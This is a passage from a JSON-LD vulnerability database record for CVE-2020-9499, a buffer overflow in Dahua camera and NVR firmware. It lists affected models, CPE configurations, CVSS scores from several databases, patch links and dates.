          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202004-1823",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hx7842h",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b3p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd1a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b3p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52a4p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n52b5p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx5842h",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n42b1p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd5a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd6al",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n54a4p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hxxx5x4x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ptz1a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "sd52c",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "n54b2p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx2xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2019-12"
          },
          {
            "model": "ipc-hx2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx5842h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx7842h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hxxx5x4x",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz1a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd1a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd50",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd52c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd5a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd6al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 6al series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 5a series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 1a series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd 50/52c series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr n5x series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr n4x series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc n4 series",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2019-12",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          }
        ]
      },
      "cve": "CVE-2020-9499",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003798",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "MULTIPLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.4,
                "id": "CNVD-2020-22979",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003798",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2020-9499",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003798",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22979",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202004-553",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-9499",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "id": "VAR-202004-1823",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:51:55.682000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "DHCC-SA-202004-001",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
          },
          {
            "title": "Patch for Multiple Dahua product buffer overflow vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/213931"
          },
          {
            "title": "Multiple Dahua Product Buffer Error Vulnerability Fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115746"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9499"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9499"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "date": "2020-04-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "date": "2020-04-09T14:15:13.213000",
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "date": "2020-04-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-05-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22979"
          },
          {
            "date": "2020-04-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003798"
          },
          {
            "date": "2021-04-19T14:57:26.277000",
            "db": "NVD",
            "id": "CVE-2020-9499"
          },
          {
            "date": "2020-05-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202004-553"
          }
        ],
